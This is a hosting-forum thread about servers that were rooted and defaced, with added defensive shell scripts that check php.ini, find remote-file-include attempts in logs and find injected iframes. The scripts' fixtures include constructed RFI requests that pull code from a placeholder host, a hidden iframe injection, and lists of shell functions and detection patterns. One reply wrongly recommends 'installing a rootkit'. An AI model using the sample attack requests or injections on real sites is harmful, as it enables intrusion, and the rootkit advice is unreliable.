noimad1 (Well-Known Member, joined Mar 27, 2003)

Did that latest bulletin about upgrading because of a security risk mean that users could get hold of the root user on a server?

I just had a server hacked, and just realized that particular server wasn't upgraded when we did all of the upgrades.

This user got full root access, and defaced all of our websites. This is the first time I've ever been hacked at the root level.

I'm wondering if they did this using this security problem...
 

designeru (Well-Known Member, joined Nov 2, 2005)

Answers...

noimad1 said:
Did that latest bulletin about upgrading because of a security risk mean that users could get hold of the root user on a server?
Yes.

I'm wondering if they did this using this security problem...
Did he leave any logs? Are you sure it was a root-level hack?

noimad1 (Well-Known Member, joined Mar 27, 2003)

designeru said:
Yes.


Did he leave any logs? Are you sure it was a root-level hack?
The files he was running were owned by root, and he defaced every site on the server...

lbccserv (Active Member, joined Mar 23, 2004)

Damn it, I just got rooted too. Changed every index on the site. Definitely root. SHIT.

lbccserv (Active Member, joined Mar 23, 2004)

10.9 c43... I was running 2.4.22-1.2115.nptl. I'm not saying it was cPanel, but I don't know what else would have dropped him into root. I haven't seen any really bad kernel exploits for 2.4.

cPDan (cPanel Staff, Staff member, joined Mar 9, 2004)

dgbaker said:
Check if any users are using FlashChat for VB, there is a known security hole in unpatched FlashChat that will do exactly this.
Excellent point. Several other common PHP scripts do this as well (at times even just because it's PHP; think XSS from a simple phpinfo script that was finally fixed just recently).

Make sure /tmp is tight and your PHP is not too loose.

I know of some companies offering hosting servers that do not have PHP on them (since it's then faster and more secure), and they report *no* hackings on those vs. their PHP ones with constant issues and monitoring for well-intentioned but nevertheless destructive PHP scripts.

The trick is educating people on alternative projects to replace their PHP-based stuff and helping them do so, but that's a whole other thread :)
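"/tmp is tight and your PHP is not too loose" are two checks an admin can script. The following is an added example, not code from the thread or from cPanel: it reads one line of mount(8) output and a php.ini, both constructed here so it runs offline, and flags the settings a shared host should not be running with. The php.ini directive names are real; the sample values and the mount line are made up for the demo.

```sh
#!/bin/sh
# Added example, not code from the thread or from cPanel: scripts the two
# checks cPDan names, a loosely mounted /tmp and a loose php.ini. It runs on
# constructed sample input so it works offline; the "Live:" comments show what
# to feed it on a real box.

# tmp_mount_ok "<the mount(8) output line for /tmp>"
# Returns 0 if the mount carries both noexec and nosuid, 1 with a message if not.
# Live: tmp_mount_ok "$(mount | grep ' on /tmp ')"
tmp_mount_ok() {
    opts=$(printf '%s\n' "$1" | sed -n 's/.*(\(.*\)).*/\1/p')
    for want in noexec nosuid; do
        case ",$opts," in
            *,"$want",*) ;;
            *) echo "/tmp is mounted without $want (options: $opts)"; return 1 ;;
        esac
    done
    return 0
}

# php_ini_findings <php.ini>
# Prints one line per loose directive; the return value is the number of
# findings, so 0 means nothing was flagged.
php_ini_findings() {
    n=0
    # Drop comments, lowercase, strip blanks so "Foo = On" and "foo=on" compare equal.
    norm=$(sed 's/[;#].*//' "$1" | tr 'A-Z' 'a-z' | tr -d ' \t')
    if printf '%s\n' "$norm" | grep -Eq '^register_globals=(on|1|true)$'; then
        echo "register_globals is on: request parameters become script variables"
        n=$((n+1))
    fi
    if printf '%s\n' "$norm" | grep -Eq '^allow_url_fopen=(on|1|true)$'; then
        echo "allow_url_fopen is on: include(\$var) can fetch code from a URL on PHP older than 5.2"
        n=$((n+1))
    fi
    # The functions that spawn a shell should all be listed in disable_functions.
    listed=$(printf '%s\n' "$norm" | sed -n 's/^disable_functions=//p' | tail -n 1)
    for f in system exec shell_exec passthru popen proc_open; do
        case ",$listed," in
            *,"$f",*) ;;
            *) echo "disable_functions does not list $f"; n=$((n+1)) ;;
        esac
    done
    return $n
}

# Constructed sample php.ini files (not taken from any real server).
write_loose_ini() {
    cat > "$1" <<'EOF'
; the settings a shared host should not be running with
register_globals = On
allow_url_fopen = On
disable_functions =
EOF
}
write_tight_ini() {
    cat > "$1" <<'EOF'
register_globals = Off
allow_url_fopen = Off
disable_functions = system, exec, shell_exec, passthru, popen, proc_open
EOF
}

# Demo on the constructed input.
tmpd=$(mktemp -d)
write_loose_ini "$tmpd/php.ini"
echo "== php.ini =="
php_ini_findings "$tmpd/php.ini" || echo "($? loose settings)"
echo "== /tmp =="
tmp_mount_ok "/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid)" && echo "/tmp mount is fine"
tmp_mount_ok "/dev/sda2 on /tmp type ext3 (rw)" || true
rm -rf "$tmpd"
```

Two caveats when reading the results. noexec on /tmp only stops a dropped binary from being run directly; `perl /tmp/x.pl` or `php /tmp/x.php` still works, so it is a speed bump, which is why the disable_functions check matters as much. And on PHP 5.2 and later, pulling code into include() from a URL is gated by allow_url_include rather than allow_url_fopen, so the second finding is worth re-checking against the version actually installed.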
 

mctDarren (Well-Known Member, joined Jan 6, 2004; New Jersey; cPanel Access Level: Root Administrator)

The current Moodle exploit is the soup du jour this week, could be that... could be one of a hundred different php holes open at the moment. :D

Fixed typo... :/

LS_Drew (Well-Known Member, joined Feb 20, 2003)

dgbaker said:
Check if any users are using FlashChat for VB, there is a known security hole in unpatched FlashChat that will do exactly this.
How is FlashChat for VB going to give someone root? A shell, sure, but root?
 

dgbaker (Well-Known Member, PartnerNOC, joined Sep 20, 2002; Toronto, Ontario Canada; cPanel Access Level: DataCenter Provider)

Take a look at the VB forum with regards to this. It does and did happen.

From SecurityFocus
FlashChat Multiple Remote File Include Vulnerabilities

FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage this issue to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

FlashChat 4.6.1 and previous versions are vulnerable.
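What one of those remote file include requests looks like in the Apache access log, and how to pull them out of it, as an added example that is not part of dgbaker's post or of the SecurityFocus advisory. The log lines are constructed: the script paths, parameter names and addresses are placeholders, not FlashChat's real ones, and the cPanel domlogs path in the last comment is an assumption about the server layout.

```sh
#!/bin/sh
# Added example, not code from the thread or from SecurityFocus: finds remote
# file include attempts in an Apache access log. An RFI attack shows up as a
# query-string parameter whose value is itself a URL, e.g. ?cfg=http://evil/x.txt?
# The sample log below is constructed; paths, parameter names and addresses
# are placeholders, not FlashChat's real ones.

# rfi_hits <access_log>
# Prints "client path parameter included_url" per suspicious request and
# returns 0 if any were found, 1 otherwise. Only the request line is examined,
# so a URL in the Referer field does not count.
rfi_hits() {
    awk '
    BEGIN { re = "[?&][^=&]*=(https?|ftp)://"; hits = 0 }
    {
        split($0, q, "\"")            # q[2] is: GET /path?query HTTP/1.1
        if (split(q[2], r, " ") < 2) next
        url = r[2]
        if (!match(url, re)) next
        hits++
        split(url, pp, "?")           # pp[1] is the script path
        param = substr(url, RSTART + 1, RLENGTH - 1); sub(/=.*/, "", param)
        inc = substr(url, RSTART + 1); sub(/^[^=]*=/, "", inc); sub(/&.*/, "", inc)
        printf "%s %s %s %s\n", $1, pp[1], param, inc
    }
    END { exit (hits > 0 ? 0 : 1) }' "$1"
}

# rfi_sources <access_log>
# The distinct hosts the attacker is pulling code from: what to block, and what
# to fetch for analysis from a machine you do not care about.
rfi_sources() {
    rfi_hits "$1" | awk '{ print $4 }' | sed 's|^[a-z]*://||; s|/.*||' | sort -u
}

# Constructed sample log in Apache combined format (not from a real server).
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [14/Apr/2006:03:14:07 +0000] "GET /chat/inc/config.php?cfg=http://198.51.100.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.23 - - [14/Apr/2006:03:14:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 4821 "http://example.com/" "Mozilla/5.0"
203.0.113.5 - - [14/Apr/2006:03:14:11 +0000] "GET /forum/modules.php?name=ftp://198.51.100.9/x.txt&op=1 HTTP/1.1" 200 77 "-" "Mozilla/4.0"
192.0.2.8 - - [14/Apr/2006:03:15:00 +0000] "POST /forum/newreply.php HTTP/1.1" 302 0 "http://example.com/forum/" "Mozilla/5.0"
EOF
}

# Demo on the constructed log.
tmpd=$(mktemp -d)
write_sample_log "$tmpd/access.log"
echo "== RFI attempts (client path parameter included_url) =="
rfi_hits "$tmpd/access.log" || echo "none"
echo "== hosts serving the included code =="
rfi_sources "$tmpd/access.log"
rm -rf "$tmpd"
# Live use on a cPanel box (path as an assumption): rfi_hits /usr/local/apache/domlogs/<domain>
```

The third column tells you which script and parameter to patch; the 200 status on those lines is what makes them worth chasing, since a fixed script would not have fetched anything. Whatever the included file does, it runs as the web server user, which is the point LS_Drew and jester.ro make in this thread: getting from that shell to root needs a second, local hole.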
 

jester.ro (Well-Known Member, PartnerNOC, joined Feb 6, 2004; Bucharest, Romania; cPanel Access Level: DataCenter Provider)

I don't get this.
PHP security holes, XSS and remote file inclusion are something we deal with every day.

But gaining root from one of these exploits?
Then how about a malicious user that is hosted on a server?
He has the nobody user, and his own user, to do evil stuff.

That would mean that NO server is secure, not only those running exploitable PHP scripts.

jugo (Active Member, joined Nov 23, 2005)

That is not root access...

That index page defacement is not a "root"-based attack. It is XSS using vulnerabilities in shoddy PHP scripts like vWar and PHP-Nuke.

The best way to stop those is to implement restrictive mod_security rules like the ones from gotroot.

Skyline_GTR (Member, joined Jul 31, 2003)

How can I possibly fix the problem? I have a server that has been infected, and most of the websites have an iframe which leads to a trojan website. How can I fix the problem?

Please help!

mikeroq (Registered, joined Jan 21, 2005)

This guy got my site like 10 times, he would delete all my files, and after I had reuploaded them all, he would delete it again.

His name is Vibutx, watch out.

noimad1 (Well-Known Member, joined Mar 27, 2003)

Skyline_GTR said:
How can I possibly fix the problem? I have a server that has been infected, and most of the websites have an iframe which leads to a trojan website. How can I fix the problem?


Please help!

The best thing to do would be to reload your OS and cPanel, then restore all of your files from a backup, if you have one from before the attack. Then make sure your OS and cPanel are both up to date and patched.

That's what we did on our server. It has been a huge nightmare. I hope the patches take care of this issue and it doesn't happen again...

Murtaza_t (Well-Known Member, joined Jan 24, 2005; Earth; cPanel Access Level: Website Owner)

Skyline_GTR said:
How can I possibly fix the problem? I have a server that has been infected, and most of the websites have an iframe which leads to a trojan website. How can I fix the problem?


Please help!
The best way would be installing a rootkit which will repair all your SSH commands if they are infected and will also take care of any trojan installed. And just replace the index pages... as far as I know they replace only index pages. And also try and get some good mod_sec rules.

And also upcp --force... that will overwrite the complete cPanel, which is as good as installing new cPanel software. You might also need to reinstall customized skins, as upcp will skip them.

You can also write a bash script that will check and list the files that have iframes in them.
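The iframe-hunting script suggested above, written out as an added example that is not code from Murtaza_t or from cPanel. It goes a little past a literal `<iframe` search: it also flags the URL-encoded `%3Ciframe` inside a `document.write(unescape(...))` in a .js file and `eval(unescape(...))`, which is how an injection hides from someone eyeballing index pages and templates. The sample web root is constructed, and the address 198.51.100.9 in it is a placeholder.

```sh
#!/bin/sh
# Added example, not code from the thread: the "bash script that will check and
# list the files that have iframes in them", extended to the forms that are
# easy to miss when you eyeball index pages and templates. The sample site is
# constructed; 198.51.100.9 is a placeholder address.

# Patterns that have no business in a static page, template or script file.
INJECT_RE='<iframe|%3ciframe|document\.write\(unescape|eval\(unescape'

# scan_injections <webroot>
# Prints file:line:snippet for every match in HTML, PHP, template and JS files.
# /dev/null is passed as an extra file so grep prints the file name even when
# find hands it a single file.
scan_injections() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' -o -name '*.php' \
        -o -name '*.tpl' -o -name '*.js' \) \
        -exec grep -inE "$INJECT_RE" /dev/null {} + | cut -c1-160
}

# injected_files <webroot>
# The distinct file names from scan_injections: the list to restore from backup.
injected_files() {
    scan_injections "$1" | cut -d: -f1 | sort -u
}

# Constructed sample web root: a page with a hidden iframe, a clean page, and a
# JS file that writes the same iframe URL-encoded so "<iframe" never appears.
make_sample_site() {
    mkdir -p "$1/js" "$1/images"
    cat > "$1/index.html" <<'EOF'
<html><body><h1>Welcome</h1>
<iframe src="http://198.51.100.9/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
EOF
    cat > "$1/about.html" <<'EOF'
<html><body><p>About us. Nothing to see here.</p></body></html>
EOF
    cat > "$1/js/footer.js" <<'EOF'
document.write(unescape('%3Ciframe src=%22http://198.51.100.9/in.cgi?3%22 width=1 height=1%3E%3C/iframe%3E'));
EOF
    printf 'not scanned\n' > "$1/images/logo.png"
}

# Demo on the constructed site.
site=$(mktemp -d)
make_sample_site "$site"
echo "== matches =="
scan_injections "$site"
echo "== files to restore from a clean backup =="
injected_files "$site"
rm -rf "$site"
# Live (cPanel home layout as an assumption): injected_files /home
```

When the iframe only shows up with JavaScript enabled and the templates look clean, as Skyline_GTR reports further down, the injection is usually sitting in a .js file or in post content stored in the database; running the same grep over a mysqldump of the forum's tables finds the latter. Restore the flagged files from a backup taken before the attack rather than editing them in place: whatever wrote them still has write access until the hole it came in through is closed.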
 

Skyline_GTR (Member, joined Jul 31, 2003)

My forum has been affected, and every time I make a quick reply, it will have this iframe under the last post... however, when I disable JavaScript, this won't happen..

As well, for my other websites, I looked at the index and the templates, but I couldn't find any iframe code at all..

Murtaza_t (Well-Known Member, joined Jan 24, 2005; Earth; cPanel Access Level: Website Owner)

Skyline_GTR said:
My forum has been affected, and every time I make a quick reply, it will have this iframe under the last post... however, when I disable JavaScript, this won't happen..

As well, for my other websites, I looked at the index and the templates, but I couldn't find any iframe code at all..
This is what you should follow:
1. Backup forums.
2. Backup Database
3. Uninstall forums.
4. Install new forums.
5. Restore database.
6. Move the images/upload folder into the new installation.

If that does not help you will need to check your database as it might be affected then.